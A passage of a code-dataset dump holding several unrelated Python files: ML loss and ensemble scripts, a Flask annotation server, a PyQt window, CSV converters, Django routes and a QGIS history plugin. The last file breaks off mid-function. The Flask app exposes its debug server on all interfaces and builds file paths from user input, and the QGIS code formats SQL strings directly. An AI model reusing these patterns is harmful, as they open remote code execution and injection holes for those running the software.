return rank_loss\n\n else:\n raise NotImplementedError\n\n\ndef cross_entropy_classifier(score):\n return torch.max(score, 1)[1].data\n\n\ndef two_step_classifier(score):\n true_label_score, other_label_score = score\n label = torch.max(true_label_score, 1)[1].data\n other_label = torch.max(other_label_score, 1)[1].data\n label[other_label == 0] = 18\n return label\n\n\ndef get_classifier(type='cross_entropy'):\n if type == 'cross_entropy':\n return cross_entropy_classifier\n elif type == 'two_step':\n return two_step_classifier\n elif type == 'rank':\n return rank_loss_classifier\n\n\ndef get_loss_classifier(type='cross_entropy'):\n return get_loss(type), get_classifier(type)\n","sub_path":"hw2/models/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":4011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"304869144","text":"import pandas as pd\r\n\r\ndata1 = pd.read_csv(r'D:\\刘帅专用\\XGBoost天池\\result_3_9101.csv')\r\ndata2 = pd.read_csv(r'D:\\刘帅专用\\XGBoost天池\\result_5_9123.csv')\r\ndata3 = pd.read_csv(r'D:\\刘帅专用\\XGBoost天池\\result_6_9139.csv')\r\ndata4 = pd.read_csv(r'D:\\刘帅专用\\XGBoost天池\\result_7_9144.csv')\r\ndata5 = pd.read_csv(r'D:\\刘帅专用\\XGBoost天池\\result_8_9144.csv')\r\n\r\n\r\ndata = pd.DataFrame()\r\ndata['row_id'] = data1['row_id']\r\ndata['r1'] = data1['shop_id']\r\ndata['r2'] = data2['shop_id']\r\ndata['r3'] = data3['shop_id']\r\ndata['r4'] = data4['shop_id']\r\ndata['r5'] = 
data5['shop_id']\r\ndata.index = [i for i in range(len(data))]\r\ndata['shop_id'] = None\r\nfor i in range(len(data)):\r\n print(i)\r\n shop = {}\r\n for j in range(len(data.columns)-1):\r\n shop_id = data.iloc[i,j+1] # .ix is removed in modern pandas; use positional .iloc\r\n shop[shop_id] = shop.get(shop_id,0) + 1\r\n sort_shop = sorted(shop.items(),key=lambda x:x[1],reverse=True)\r\n pre_shop_id = sort_shop[0][0]\r\n data.loc[i,'shop_id'] = pre_shop_id # .loc avoids chained-assignment pitfalls\r\n\r\nprint(data)\r\ndata = data[['row_id','shop_id']]\r\ndata.to_csv('pre.csv',index=None)","sub_path":"阿里天池_商铺定位/ronghe_35678.py","file_name":"ronghe_35678.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"103421387","text":"import flask\nimport json\nfrom collections import defaultdict\n\nimport annotator\nimport article\nimport config\nimport reader\nimport writer\nimport numpy as np\nimport pandas as pd\n\nimport model_utils\n\napplication = flask.Flask(__name__)\n\nanne = annotator.Annotator(reader.get_reader(config.reader)(**config.reader_params),\n writer.get_writer(config.writer)(**config.writer_params))\n\nvalid_users = np.loadtxt('usernames.txt', delimiter = ',', dtype = 'str')\nmodel_annotations = json.load(open('data/model_annotations.json'))\n\nall_anns = pd.read_csv('out_fernando.csv')\n\n\"\"\"\nDisplay the main page.\n\"\"\"\n@application.route('/', methods=['GET'])\ndef index():\n return flask.render_template('index.html')\n\n\"\"\"\nStart the program.\n\"\"\"\n@application.route('/start/<userid>/', methods=['GET', 'POST'])\ndef start(userid):\n if not(userid in valid_users):\n return flask.render_template('index_invalid_user.html')\n \n id_ = anne.get_next_file(userid)\n if not id_:\n return flask.redirect(flask.url_for('finish'))\n else:\n return flask.redirect(flask.url_for('annotate_full', \n userid = userid, \n id_ = id_))\n \n\"\"\"\nStart the program, but show the error to the user first.\n\"\"\"\n@application.route('/invalid_user/', methods=['GET', 'POST'])\ndef invalid_user():\n userid = flask.request.form['userid']\n if not(userid in valid_users):\n return flask.render_template('index_invalid_user.html', should_show = \"true\")\n \n id_ = anne.get_next_file(userid)\n if not id_:\n return flask.redirect(flask.url_for('finish'))\n else:\n return flask.redirect(flask.url_for('annotate_abstract', \n userid = userid, \n id_ = id_))\n\n\"\"\"\nDisplay just the abstract.\n\"\"\" \n@application.route('/annotate_abstract/<userid>/<id_>/', methods=['GET'])\ndef annotate_abstract(userid, id_ = None):\n if id_ is None:\n art = anne.get_next_article(userid)\n else:\n art = anne.get_next_article(userid, id_)\n \n \n if not art:\n return flask.redirect(flask.url_for('finish'))\n else:\n save_last_path(userid, art.get_extra()['path'])\n return flask.render_template('article.html',\n userid = userid,\n id = art.id_,\n pid = id_,\n tabs = json.dumps(art.text),\n xml_file = art.get_extra()['path'],\n outcome = art.get_extra()['outcome'],\n intervention = art.get_extra()['intervention'],\n comparator = art.get_extra()['comparator'],\n options = config.options_full)\n\n\"\"\"\nGrabs a specified article and displays the full text.\n\"\"\" \n@application.route('/annotate_full/<userid>/<id_>/', methods=['GET'])\ndef annotate_full(userid, id_ = None):\n if id_ is None:\n art = anne.get_next_article(userid)\n else:\n art = anne.get_next_article(userid, id_)\n\n if not art:\n return flask.redirect(flask.url_for('finish'))\n \n anns = []\n for idx, a in all_anns.iterrows():\n if str(a['RowID']) == id_.replace('PMC', 
","sub_path":"阿里天池_商铺定位/ronghe_35678.py","file_name":"ronghe_35678.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"103421387","text":"import flask\nimport json\nfrom collections import defaultdict\n\nimport annotator\nimport article\nimport config\nimport reader\nimport writer\nimport numpy as np\nimport pandas as pd\n\nimport model_utils\n\napplication = flask.Flask(__name__)\n\nanne = annotator.Annotator(reader.get_reader(config.reader)(**config.reader_params),\n                           writer.get_writer(config.writer)(**config.writer_params))\n\nvalid_users = np.loadtxt('usernames.txt', delimiter = ',', dtype = 'str')\nmodel_annotations = json.load(open('data/model_annotations.json'))\n\nall_anns = pd.read_csv('out_fernando.csv')\n\n\"\"\"\nDisplay the main page.\n\"\"\"\n@application.route('/', methods=['GET'])\ndef index():\n    return flask.render_template('index.html')\n\n\"\"\"\nStart the program.\n\"\"\"\n@application.route('/start/<userid>/', methods=['GET', 'POST'])\ndef start(userid):\n    if not(userid in valid_users):\n        return flask.render_template('index_invalid_user.html')\n    \n    id_ = anne.get_next_file(userid)\n    if not id_:\n        return flask.redirect(flask.url_for('finish'))\n    else:\n        return flask.redirect(flask.url_for('annotate_full', \n                                            userid = userid, \n                                            id_ = id_))\n    \n\"\"\"\nStart the program, but show the error to the user first.\n\"\"\"\n@application.route('/invalid_user/', methods=['GET', 'POST'])\ndef invalid_user():\n    userid = flask.request.form['userid']\n    if not(userid in valid_users):\n        return flask.render_template('index_invalid_user.html', should_show = \"true\")\n    \n    id_ = anne.get_next_file(userid)\n    if not id_:\n        return flask.redirect(flask.url_for('finish'))\n    else:\n        return flask.redirect(flask.url_for('annotate_abstract', \n                                            userid = userid, \n                                            id_ = id_))\n\n\"\"\"\nDisplay just the abstract.\n\"\"\" \n@application.route('/annotate_abstract/<userid>/<id_>/', methods=['GET'])\ndef annotate_abstract(userid, id_ = None):\n    if id_ is None:\n        art = anne.get_next_article(userid)\n    else:\n        art = anne.get_next_article(userid, id_)\n    \n    if not art:\n        return flask.redirect(flask.url_for('finish'))\n    else:\n        save_last_path(userid, art.get_extra()['path'])\n        return flask.render_template('article.html',\n                                     userid = userid,\n                                     id = art.id_,\n                                     pid = id_,\n                                     tabs = json.dumps(art.text),\n                                     xml_file = art.get_extra()['path'],\n                                     outcome = art.get_extra()['outcome'],\n                                     intervention = art.get_extra()['intervention'],\n                                     comparator = art.get_extra()['comparator'],\n                                     options = config.options_full)\n\n\"\"\"\nGrabs a specified article and displays the full text.\n\"\"\" \n@application.route('/annotate_full/<userid>/<id_>/', methods=['GET'])\ndef annotate_full(userid, id_ = None):\n    if id_ is None:\n        art = anne.get_next_article(userid)\n    else:\n        art = anne.get_next_article(userid, id_)\n\n    if not art:\n        return flask.redirect(flask.url_for('finish'))\n    \n    anns = []\n    for idx, a in all_anns.iterrows():\n        if str(a['RowID']) == id_.replace('PMC', ''):\n            data = { 'idx': idx }\n            for k in ['Intervention', 'Comparator', 'Outcome']:\n                data[k] = a[k]\n            anns.append(data)\n\n    save_last_path(userid, art.get_extra()['path'])\n    return flask.render_template('full_article.html',\n                                 userid = userid,\n                                 annotations = anns,\n                                 id = art.id_,\n                                 pid = id_,\n                                 tabs = art.text,\n                                 xml_file = get_last_path(userid),\n                                 outcome = art.get_extra()['outcome'],\n                                 intervention = art.get_extra()['intervention'],\n                                 comparator = art.get_extra()['comparator'],\n                                 options = config.options_full)\n\n\"\"\"\nGrabs a specified article and displays it with the model's annotations.\n\"\"\" \n@application.route('/browse/<userid>/<id_>/', methods=['GET'])\ndef browse(userid, id_ = None):\n    try:\n        if id_ is None:\n            art = anne.get_next_article(userid)\n        else:\n            art = anne.get_next_article(userid, id_)\n    except:\n        return annotate_abstract(userid, id_)\n    \n    if not art:\n        return flask.redirect(flask.url_for('finish'))\n    else:\n        annos = model_annotations['docs'][id_]\n        return flask.render_template('browse_article.html',\n                                     userid = userid,\n                                     id = art.id_,\n                                     pid = id_,\n                                     tabs = art.text,\n                                     spans = annos,\n                                     xml_file = get_last_path(userid),\n                                     options = config.options_full)\n\n@application.route('/instructions/')\ndef instructions():\n    return flask.render_template('instructions.html')\n    \n\"\"\"\nSubmits the article id with all annotations.\n\"\"\"\n@application.route('/submit/', methods=['POST'])\ndef submit():\n    userid = flask.request.form['userid']\n    anne.submit_annotation(flask.request.form)\n\n    id_ = anne.get_next_file(userid)\n    if not id_:\n        return flask.redirect(flask.url_for('finish'))\n    else:\n        return flask.redirect(flask.url_for('annotate_full', userid = userid, id_ = id_))\n\n\"\"\"\nOnly go to this if there are no more articles to be annotated.\n\"\"\"\n@application.route('/finish/', methods=['GET'])\ndef finish():\n    return flask.render_template('finish.html')\n\n\"\"\"\nCall the get results function.\n\"\"\"\n@application.route('/results/', methods=['GET'])\ndef results():\n    return anne.get_results()\n    \n\"\"\"\nGet the last path.\n\"\"\"\ndef get_user_progress_fname(user):\n    return 'data/{}_progress.txt'.format(user)\n\ndef get_last_path(user):\n    return open(get_user_progress_fname(user)).read()\n    \ndef save_last_path(user, path):\n    with open(get_user_progress_fname(user), 'w') as fp:\n        fp.write(path)\n\n\"\"\"\nRun the application.\n\"\"\"\nif __name__ == '__main__':\n    #application.run()\n    application.run(host = '0.0.0.0', port = 8001, debug = True)  \n","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":6562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"27540699","text":"#! 
/usr/bin/env python3\n# coding : utf-8\n\n\nimport os\nimport argparse\nimport json\n\nimport tqdm\nimport glob\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\n\nfrom functions import read_data, \\\n load_model, load_image, extract_image_id\n\n\ndef encode_image(image):\n features = encoder(image)\n features = np.squeeze(features)\n\n return features\n\ndef main():\n # construct the argument parse and parse the arguments\n ap = argparse.ArgumentParser()\n\n ap.add_argument(\"-d\", \"--data_dir\", required=True,\n help=\"Path to the images directory\")\n ap.add_argument(\"-m\", \"--model_path\", required=True,\n help=\"Path to the the model\")\n ap.add_argument(\"-i\", \"--input\", type=int, required=True, default=299,\n help=\"The input size\")\n ap.add_argument(\"-o\", \"--output\", required=True,\n help=\"Path to the output file\")\n\n args = vars(ap.parse_args())\n size = args['input']\n\n # model\n print(\"Loading model...\")\n subdir = args[\"model_path\"]\n model_path = glob.glob(subdir+'*.h5')[-1]\n model = load_model(model_path)\n\n # data\n print(\"Reading data...\")\n filenames, _, _ = read_data(args[\"data_dir\"])\n n_files = len(filenames)\n\n # encoding\n print(\"Encoding images...\")\n index_to_filename = {}\n filename_to_path = {}\n features = np.zeros((n_files, model.output.shape[1]))\n for i in tqdm.tqdm(range(n_files)):\n image_id = extract_image_id(filenames[i])\n index_to_filename[i] = image_id\n filename_to_path[image_id] = filenames[i]\n #print(\"->\", image_id)\n image = load_image(filenames[i], (size, size))\n image = image.reshape((1,)+image.shape)\n\n features[i] = np.squeeze(model(image))\n\n # save transfer values\n np.save(args[\"output\"], features)\n with open(\"index_to_filename.json\", \"w\") as f:\n json.dump(index_to_filename, f, indent=4, ensure_ascii=False)\n with open(\"filename_to_path.json\", \"w\") as f:\n json.dump(filename_to_path, f, indent=4, ensure_ascii=False)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"encode.py","file_name":"encode.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"9958028","text":"import sys\n\nfrom PyQt5.QtCore import QMetaObject, Qt, pyqtSignal, pyqtSlot\nfrom PyQt5.QtGui import QColor, QIcon, QPalette\nfrom PyQt5.QtWidgets import QApplication, QHBoxLayout, QLabel, QSizePolicy, QToolButton, QVBoxLayout, QWidget\n\nfrom resources.style import resources\n\nSTYLESHEET = 'resources/style/style.qss'\nDARK_WINDOW_STYLESHEET = 'resources/style/stylesheet.css'\n\n\nclass TitleBar(QWidget):\n double_clicked = pyqtSignal()\n\n def __init__(self, window, parent=None):\n QWidget.__init__(self, parent)\n\n self.__window = window\n self.__window_pos = None\n\n self.__mouse_pos = None\n self.__mouse_clicked = False\n\n def mousePressEvent(self, event):\n self.__mouse_clicked = True\n self.__mouse_pos = event.globalPos()\n self.__window_pos = self.__window.pos()\n\n def mouseMoveEvent(self, event):\n if self.__mouse_clicked:\n self.__window.move(self.__window_pos + (event.globalPos() - self.__mouse_pos))\n\n def mouseReleaseEvent(self, event):\n self.__mouse_clicked = False\n\n def mouseDoubleClickEvent(self, event):\n self.double_clicked.emit()\n\n\nclass DarkWindow(QWidget):\n def __init__(self, application, window_content, parent=None):\n QWidget.__init__(self, parent)\n\n self.content = window_content\n\n self.setup_ui()\n self.setup_palette(application)\n self.setup_events()\n\n def setup_ui(self):\n 
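# Build the frameless window chrome (a short orientation comment, added): an outer\n        # transparent layout wraps a styled frame whose top row is the custom TitleBar\n        # (drag-to-move plus minimize/restore/maximize/close buttons) above the content.\n        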
self.dark_layout = QVBoxLayout(self)\n self.dark_layout.setContentsMargins(0, 0, 0, 0)\n\n self.window_frame = QWidget(self)\n self.window_frame.setObjectName('window_frame')\n\n self.window_layout = QVBoxLayout(self.window_frame)\n self.window_layout.setContentsMargins(0, 0, 0, 0)\n\n self.title_bar = TitleBar(self, self.window_frame)\n self.title_bar.setObjectName('title_bar')\n self.title_bar.setSizePolicy(QSizePolicy(QSizePolicy.Preferred, QSizePolicy.Fixed))\n\n self.window_title = QLabel()\n self.window_title.setObjectName('window_title')\n self.window_title.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)\n\n self.btn_minimize = QToolButton()\n self.btn_minimize.setObjectName('btn_minimize')\n self.btn_minimize.setIcon(QIcon(':/minimize.png'))\n self.btn_minimize.setSizePolicy(QSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed))\n\n self.btn_restore = QToolButton()\n self.btn_restore.setObjectName('btn_restore')\n self.btn_restore.setIcon(QIcon(':/restore.png'))\n self.btn_restore.setVisible(False)\n self.btn_restore.setSizePolicy(QSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed))\n\n self.btn_maximize = QToolButton()\n self.btn_maximize.setObjectName('btn_maximize')\n self.btn_maximize.setIcon(QIcon(':/maximize.png'))\n self.btn_maximize.setSizePolicy(QSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed))\n\n self.btn_close = QToolButton()\n self.btn_close.setObjectName('btn_close')\n self.btn_close.setIcon(QIcon(':/close.png'))\n self.btn_close.setSizePolicy(QSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed))\n\n self.title_bar_layout = QHBoxLayout(self.title_bar)\n self.title_bar_layout.setContentsMargins(0, 0, 0, 0)\n self.title_bar_layout.setSpacing(0)\n self.title_bar_layout.addWidget(self.window_title)\n self.title_bar_layout.addWidget(self.btn_minimize)\n self.title_bar_layout.addWidget(self.btn_maximize)\n self.title_bar_layout.addWidget(self.btn_restore)\n self.title_bar_layout.addWidget(self.btn_close)\n\n self.window_layout.addWidget(self.title_bar)\n self.window_content = QWidget(self.window_frame)\n self.window_content.setObjectName('window_content')\n self.window_layout.addWidget(self.window_content)\n\n self.dark_layout.addWidget(self.window_frame)\n\n content_layout = QHBoxLayout()\n content_layout.setContentsMargins(0, 0, 0, 0)\n content_layout.addWidget(self.content)\n self.window_content.setLayout(content_layout)\n\n self.setWindowTitle(self.content.windowTitle())\n self.setGeometry(self.content.geometry())\n\n # set window flags\n self.setWindowFlags(Qt.Window | Qt.FramelessWindowHint | Qt.WindowSystemMenuHint | Qt.WindowMinMaxButtonsHint)\n self.setAttribute(Qt.WA_TranslucentBackground)\n\n # set stylesheet\n with open(DARK_WINDOW_STYLESHEET) as stylesheet:\n self.setStyleSheet(stylesheet.read())\n\n # connect slots\n QMetaObject.connectSlotsByName(self)\n\n def setup_palette(self, app):\n app.setStyle('Fusion')\n with open(STYLESHEET) as stylesheet:\n self.setStyleSheet(stylesheet.read())\n\n palette = QPalette()\n palette.setColor(QPalette.Window, QColor(53, 53, 53))\n palette.setColor(QPalette.WindowText, Qt.white)\n palette.setColor(QPalette.Base, QColor(25, 25, 25))\n palette.setColor(QPalette.AlternateBase, QColor(53, 53, 53))\n palette.setColor(QPalette.ToolTipBase, Qt.white)\n palette.setColor(QPalette.ToolTipText, Qt.white)\n palette.setColor(QPalette.Text, Qt.white)\n palette.setColor(QPalette.Button, QColor(53, 53, 53))\n palette.setColor(QPalette.ButtonText, Qt.white)\n palette.setColor(QPalette.BrightText, Qt.red)\n palette.setColor(QPalette.Link, QColor(42, 
130, 218))\n palette.setColor(QPalette.Highlight, QColor(42, 130, 218))\n palette.setColor(QPalette.HighlightedText, Qt.black)\n\n # disabled\n palette.setColor(QPalette.Disabled, QPalette.WindowText,\n QColor(127, 127, 127))\n palette.setColor(QPalette.Disabled, QPalette.Text,\n QColor(127, 127, 127))\n palette.setColor(QPalette.Disabled, QPalette.ButtonText,\n QColor(127, 127, 127))\n palette.setColor(QPalette.Disabled, QPalette.Highlight,\n QColor(80, 80, 80))\n palette.setColor(QPalette.Disabled, QPalette.HighlightedText,\n QColor(127, 127, 127))\n\n app.setPalette(palette)\n\n def setup_events(self):\n self.content.close = self.close\n self.closeEvent = self.content.closeEvent\n\n def setWindowTitle(self, p_str):\n self.window_title.setText(p_str)\n\n @pyqtSlot()\n def on_btn_minimize_clicked(self):\n self.setWindowState(Qt.WindowMinimized)\n\n @pyqtSlot()\n def on_btn_restore_clicked(self):\n self.btn_restore.setVisible(False)\n self.btn_maximize.setVisible(True)\n\n self.setWindowState(Qt.WindowNoState)\n\n @pyqtSlot()\n def on_btn_maximize_clicked(self):\n self.btn_restore.setVisible(True)\n self.btn_maximize.setVisible(False)\n\n self.setWindowState(Qt.WindowMaximized)\n\n @pyqtSlot()\n def on_btn_close_clicked(self):\n self.close()\n\n @pyqtSlot()\n def on_title_bar_doubleClicked(self):\n if self.btn_maximize.isVisible():\n self.on_btn_maximize_clicked()\n else:\n self.on_btn_restore_clicked()\n\n\nif __name__ == '__main__':\n app = QApplication([])\n test = QWidget()\n\n gui = DarkWindow(app, test)\n gui.setWindowTitle('E7 Gear Optimizer')\n gui.show()\n\n sys.exit(app.exec_())\n","sub_path":"darktheme.py","file_name":"darktheme.py","file_ext":"py","file_size_in_byte":7309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"261134449","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport json\n\n\nclass Convert2Json(object):\n recap = False\n chapter = 0\n csv_dict = {}\n\n #Get Command Line Arguments\n def run(self):\n self.read_csv(\"database.csv\", \"database.json\", 1)\n self.read_csv(\"part.csv\", \"part.json\", 0)\n self.read_csv(\"index.csv\", \"index.json\", 2)\n\n def parse_part(self, row):\n fields = row.split(\"::\")\n exists_paragraph = False\n paragraphs = [p['id'] for p in self.csv_dict['paragraph'] if p['chapter'] == int(fields[0])]\n if paragraphs:\n exists_paragraph = True\n return {'id': int(fields[0]),\n 'parent': int(fields[1]),\n 'name': fields[2],\n 'exist_paragraph': exists_paragraph}\n\n def parse_index(self, row):\n fields = row.split(\"::\")\n key_dict = {'Á': 'A', 'Ú': 'U',\n 'Ď': 'D', 'ú': 'u', 'ď': 'd'}\n name = fields[2].strip()\n if name.startswith(\"\"):\n if name.startswith(\"ch\"):\n key = \"ch\"\n else:\n key = name[3]\n else:\n key = name[0]\n if key in key_dict.keys():\n key = key_dict[key]\n refs = self.parse_refs(fields[1])\n return {'see': fields[0], 'refs': refs, 'key': key.upper(), 'name': fields[2].strip()}\n\n def parse_refs(self, refs):\n if '-' in refs:\n list_refs = []\n for r in refs.split(','):\n if '-' in r:\n begin, end = r.split('-')\n list_refs.extend(map(str, range(int(begin), int(end)+1)))\n else:\n list_refs.append(r)\n return ','.join(list_refs)\n else:\n return refs\n\n def parse_database(self, row):\n fields = row.split(\"::\")\n if \"souhrn\" in fields[2].lower():\n self.recap = True\n self.chapter = int(fields[3])\n else:\n try:\n if self.chapter != int(fields[3]) or fields[2] != \"\":\n self.recap = False\n except ValueError:\n fields[3] = 0\n self.recap = 
False\n        refs = self.parse_refs(fields[4])\n        return {'id': int(fields[0]),\n                'caption': fields[1],\n                'caption_no_html': fields[2],\n                'chapter': int(fields[3]),\n                'refs': refs,\n                'text': fields[5],\n                'text_no_html': fields[6],\n                'recap': int(self.recap),\n                }\n\n    #Read CSV File\n    def read_csv(self, input_file, output_file, fnc):\n        csv_content = []\n        if fnc == 0:\n            name = \"chapters\"\n        elif fnc == 1:\n            name = \"paragraph\"\n        else:\n            name = \"index\"\n        with open(input_file, 'r') as csvfile:\n            for row in csvfile.readlines():\n                if fnc == 0:\n                    csv_content.append(self.parse_part(row))\n                elif fnc == 1:\n                    csv_content.append(self.parse_database(row))\n                else:\n                    csv_content.append(self.parse_index(row))\n        self.write_json(csv_content, name, output_file)\n\n    #Convert csv data into json and write it\n    def write_json(self, data, name, json_file):\n        data_to_write = {name: data}\n        self.csv_dict[name] = data\n        with open(json_file, \"w\") as f:\n            json.dump(data_to_write, f, indent=4, ensure_ascii=False)\n\n\nif __name__ == \"__main__\":\n    cj = Convert2Json()\n    cj.run()\n","sub_path":"convert_csv_json.py","file_name":"convert_csv_json.py","file_ext":"py","file_size_in_byte":3582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"255114432","text":"# Calculates which weekday you were born on and how many days you have lived until today\n# Important: enter the date in the format (dd/mm/aaaa), e.g. 18/06/1944\nimport datetime\n\nsemana = ['segunda', 'terça', 'quarta', 'quinta', 'sexta', 'sabado', 'domingo']\n\ndata_quero = input('Digite o dia (dd/mm/aaaa): ')\ndata_formatada = datetime.datetime.strptime(data_quero, '%d/%m/%Y')\nhoje = datetime.datetime.today()\ndelta = hoje - data_formatada\n\ndia = 0\n\nfor x in semana:\n    if semana.index(x) == data_formatada.weekday():\n        dia = x\n\nprint(f'\\nVoce nasceu num(a) {dia}\\n')\nprint(f'Voce ja viveu {delta.days} dias até hoje')\n","sub_path":"diaQueNasci.py","file_name":"diaQueNasci.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"111218967","text":"from django.urls import path\nfrom .views import Teams\n\nurlpatterns = [\n    path('', Teams.index, name='teams'),\n    path('leagues', Teams.teamLeagues, name='teamLeagues'),\n    path('leagues/', Teams.teamLeague, name='teamLeague'),\n    path('leagues//', Teams.team, name='team'),\n    path('search', Teams.search, name='search'),\n]\n\n","sub_path":"teams/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"78615077","text":"'''\nCreated on January, 29th 2020\n\n@author: arxit\n'''\nfrom datetime import datetime\nfrom PyQt5.QtCore import QDateTime\nfrom qgis.core import QgsDataSourceUri, QgsVectorLayer, QgsFeatureRequest, Qgis\nfrom qgis.gui import QgisInterface\n\nfrom .histoparam import HistoParamTable\nfrom .layer import Layer\nfrom .histolayer import HistoLayer\nfrom .histoevent import HistoEvent\nfrom .histoeventtype import HistoEventTypeTable\nfrom .historyfeature import HistoryFeature\nfrom .featuremode import Mode\nfrom .valuemap import ValueMap\n\nfrom .widgets.saveManagementTool.saveManagementToolDialog import SaveManagementToolDialog\n\n\nclass MapLayer(Layer):\n    def __init__(self, mapLayer: QgsVectorLayer, iface: QgisInterface):\n        super().__init__(mapLayer.dataProvider().uri())\n\n        self.iface = iface\n        self.isValid = False\n\n        if type(mapLayer) is not QgsVectorLayer:\n            return\n\n        
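# Historisation is only wired up for PostgreSQL-backed vector layers, so\n        # anything else is rejected by the provider check below.\n        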
if mapLayer.providerType() != \"postgres\":\n return\n\n self.isValid = mapLayer.isValid()\n\n self.mapLayer = mapLayer\n self.listenToCommit = False\n\n self.histoParamTable = HistoParamTable.fromOtherLayerUri(mapLayer.dataProvider().uri())\n self.histoLayer = HistoLayer.fromMapLayerUri(mapLayer.dataProvider().uri(), self.histoParamTable)\n self.histoEvent = HistoEvent.fromOtherLayerUri(mapLayer.dataProvider().uri())\n self.histoEventTypeTable = HistoEventTypeTable.fromOtherLayerUri(mapLayer.dataProvider().uri())\n self._initValueMaps()\n\n def _initValueMaps(self):\n self.valueMaps = []\n\n for field in self.mapLayer.fields():\n if field.editorWidgetSetup().type() == \"ValueMap\":\n self.valueMaps.append(ValueMap.fromValueMapConfig(field.name(), field.editorWidgetSetup().config()))\n if field.editorWidgetSetup().type() == \"ValueRelation\":\n self.valueMaps.append(ValueMap.fromValueRelationConfig(field.name(), field.editorWidgetSetup().config()))\n\n def getVectorLayer(self):\n return self.mapLayer\n\n def isHistorisable(self) -> bool:\n return self.isValid and type(self.mapLayer) is QgsVectorLayer and self.histoParamTable.isValid()\n\n def isAlreadyHistorized(self) -> bool:\n return self.isHistorisable() and self.histoParamTable.containsTableName(self.uri.table())\n\n def setListenToCommit(self, listen: bool):\n if not self.isAlreadyHistorized():\n return\n\n if self.listenToCommit == listen:\n return\n\n if listen:\n self.getVectorLayer().beforeCommitChanges.connect(self.onBeforeCommitChanges)\n self.getVectorLayer().committedFeaturesAdded.connect(self.onCommittedFeaturesAdded)\n self.getVectorLayer().committedAttributeValuesChanges.connect(self.onCommittedAttributeValuesChanges)\n self.getVectorLayer().committedGeometriesChanges.connect(self.onCommittedGeometriesChanges)\n self.getVectorLayer().afterCommitChanges.connect(self.onAfterCommitChanges)\n else:\n self.getVectorLayer().beforeCommitChanges.disconnect(self.onBeforeCommitChanges)\n self.getVectorLayer().committedFeaturesAdded.disconnect(self.onCommittedFeaturesAdded)\n self.getVectorLayer().committedAttributeValuesChanges.disconnect(self.onCommittedAttributeValuesChanges)\n self.getVectorLayer().committedGeometriesChanges.disconnect(self.onCommittedGeometriesChanges)\n self.getVectorLayer().afterCommitChanges.disconnect(self.onAfterCommitChanges)\n\n def historizeTable(self, displayField: str, idField: str):\n now = QDateTime.currentDateTime()\n\n codeFields = []\n\n for valueMap in self.valueMaps:\n codeFields.append(valueMap.sourceFieldName)\n\n query = \"SELECT {0}.create_h_table('{0}', '{1}', '{2}', ARRAY[{3}]::text[] );\".format(self.uri.schema(), self.uri.table(),\n self.uri.geometryColumn(), \"'{0}'\".format(\"','\".join(codeFields)) if len(codeFields) > 0 else \"\")\n conn = self.getSqlConnection()\n cursor = conn.cursor()\n cursor.execute(query)\n data = cursor.fetchone()\n conn.commit()\n\n eventId = self.histoEvent.addEvent(0, \"Historisation de la table \" + self.uri.table(), now)\n\n self.histoParamTable.addTableName(self.uri.table(), displayField, idField)\n\n self.histoLayer = HistoLayer.fromMapLayerUri(self.mapLayer.dataProvider().uri(), self.histoParamTable)\n\n self.histoLayer.initializeTable(now, eventId, self.valueMaps)\n\n def onBeforeCommitChanges(self):\n # For added and modified, process after commit for DB default values\n self.added = []\n self.modifiedGeometries = []\n self.modifiedAttributes = []\n\n # For deleted, process before commit\n editBuffer = self.getVectorLayer().editBuffer()\n deletedIds = 
editBuffer.deletedFeatureIds()\n        self.deleted = [] if len(deletedIds) == 0 else list(self.getDatabaseFeatures(QgsFeatureRequest(deletedIds)))\n\n    def onCommittedFeaturesAdded(self, layerId, addedFeatures):\n        self.added = addedFeatures\n\n    def onCommittedAttributeValuesChanges(self, layerId, changedAttributesValues):\n        self.modifiedAttributes = changedAttributesValues\n\n    def onCommittedGeometriesChanges(self, layerId, changedGeometries):\n        self.modifiedGeometries = changedGeometries\n\n    def onAfterCommitChanges(self):\n        # Get modifications\n        addedIds = list(map(lambda x: x.id(), self.added))\n        added = [] if len(addedIds) == 0 else list(self.getFeatures(QgsFeatureRequest(addedIds)))\n\n        modifiedIds = list(set(list(self.modifiedGeometries)+list(self.modifiedAttributes)))\n        modified = [] if len(modifiedIds) == 0 else list(self.getFeatures(QgsFeatureRequest(modifiedIds)))\n\n        deleted = list(self.deleted)\n\n        # Get user events\n        dlg = SaveManagementToolDialog(self.getVectorLayer().name(), self.uri.table(), self.histoParamTable, self.histoEventTypeTable, added, modified, deleted)\n        dlg.exec()\n\n        # Add events\n        eventDate = QDateTime.currentDateTime()\n        eventMap = dict()\n\n        for index, event in enumerate(dlg.finalEvents()):\n            (type, description) = event\n            eventId = self.histoEvent.addEvent(type, description, eventDate)\n            eventMap[index] = eventId\n\n        # History features\n        self.histoLayer.startEditing()\n\n        for historyFeature in dlg.finalFeaturesToHistorize():\n            if historyFeature.mode.mode == Mode.Ajout:\n                self.histoLayer.addHistoFeature(historyFeature.feature, eventDate, eventMap[historyFeature.eventIndex], self.valueMaps)\n            